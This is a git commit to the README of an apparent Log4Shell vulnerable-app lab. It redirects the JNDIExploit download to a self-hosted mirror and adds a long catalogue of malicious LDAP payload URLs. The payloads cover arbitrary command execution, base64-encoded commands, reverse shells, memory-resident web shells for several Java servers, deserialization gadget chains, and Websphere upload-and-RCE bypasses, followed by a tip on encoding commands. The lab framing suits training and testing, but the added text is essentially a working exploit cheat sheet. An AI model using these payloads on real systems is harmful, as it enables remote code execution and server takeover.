Actualizar 'README.md'

2023-06-12 15:14:16 +00:00 · 2023-06-12 15:14:16 +00:00 · 42b1785385
commit 42b1785385
parent ba7df557a0
1 changed files with 55 additions and 2 deletions
--- a/README.md
+++ b/README.md
@ -19,9 +19,9 @@ docker run --name vulnerable-app --rm -p 8080:8080 ghcr.io/christophetd/log4shel
 *Note: This is highly inspired from the original [LunaSec advisory](https://www.lunasec.io/docs/blog/log4j-zero-day/). **Run at your own risk, preferably in a VM in a sandbox environment**.*

 **Update (Dec 13th)**: *The JNDIExploit repository has been removed from GitHub (presumably, [not by GitHub](https://twitter.com/_mph4/status/1470343429599211528))... 
-[Click Here](http://web.archive.org/web/20211211031401/https://objects.githubusercontent.com/github-production-release-asset-2e65be/314785055/a6f05000-9563-11eb-9a61-aa85eca37c76?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20211211%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20211211T031401Z&X-Amz-Expires=300&X-Amz-Signature=140e57e1827c6f42275aa5cb706fdff6dc6a02f69ef41e73769ea749db582ce0&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=314785055&response-content-disposition=attachment%3B%20filename%3DJNDIExploit.v1.2.zip&response-content-type=application%2Foctet-stream) to Download the version cached by the Wayback Machine.*
+[Click Here](https://gitea.avc.cx/borekon/log4shell-vulnerable-app/raw/branch/main/JNDIExploit.v1.2.zip) to Download it

-* Use [JNDIExploit](https://github.com/feihong-cs/JNDIExploit/releases/tag/v1.2) to spin up a malicious LDAP server
+* Use [JNDIExploit](https://github.com/zzwlpx/JNDIExploit) to spin up a malicious LDAP server

 ```bash
 wget https://github.com/feihong-cs/JNDIExploit/releases/download/v1.2/JNDIExploit.v1.2.zip
@ -61,6 +61,59 @@ pwned
 ...
 ```

+## Supported LDAP queries
+
+All words are **case INSENSITIVE** when send to ldap server
+```
+[+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g.
+    ldap://127.0.0.1:1389/Basic/Dnslog/[domain]
+    ldap://127.0.0.1:1389/Basic/Command/[cmd]
+    ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
+    ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port]  ---windows NOT supported
+    ldap://127.0.0.1:1389/Basic/TomcatMemshell
+    ldap://127.0.0.1:1389/Basic/JettyMemshell
+    ldap://127.0.0.1:1389/Basic/WeblogicMemshell
+    ldap://127.0.0.1:1389/Basic/JBossMemshell
+    ldap://127.0.0.1:1389/Basic/WebsphereMemshell
+    ldap://127.0.0.1:1389/Basic/SpringMemshell
+
+[+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialize/[GadgetType]/[PayloadType]/[Params], e.g.
+    ldap://127.0.0.1:1389/Deserialize/URLDNS/[domain]
+    ldap://127.0.0.1:1389/Deserialize/CommonsCollections1/Dnslog/[domain]
+    ldap://127.0.0.1:1389/Deserialize/CommonsCollections2/Command/[cmd]
+    ldap://127.0.0.1:1389/Deserialize/CommonsBeanutils1/Command/Base64/[base64_encoded_cmd]
+    ldap://127.0.0.1:1389/Deserialize/C3P0/ReverseShell/[ip]/[port]  ---windows NOT supported
+    ldap://127.0.0.1:1389/Deserialize/Jre8u20/TomcatMemshell    ---ALSO support other memshells
+
+[+] TomcatBypass Queries
+    ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]
+    ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]
+    ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]
+    ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port]  ---windows NOT supported
+    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell
+    ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell
+
+[+] GroovyBypass Queries
+    ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]
+    ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]
+
+[+] WebsphereBypass Queries
+    ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]
+    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]
+    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]
+    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]
+    ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port]  ---windows NOT supported
+    ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell
+    ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path]   ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp
+```
+### base64 trick
+
+You can convert from a command to base64 with this [online web](https://www.base64encode.org/)
+
+**Note** that the `+`sign must be encoded has %2B. The following chart shows more posibilities:
+![image](https://svbtleusercontent.com/nnlmc8unyj0ibg_small.png)
+
+
 ## Reference

 https://www.lunasec.io/docs/blog/log4j-zero-day/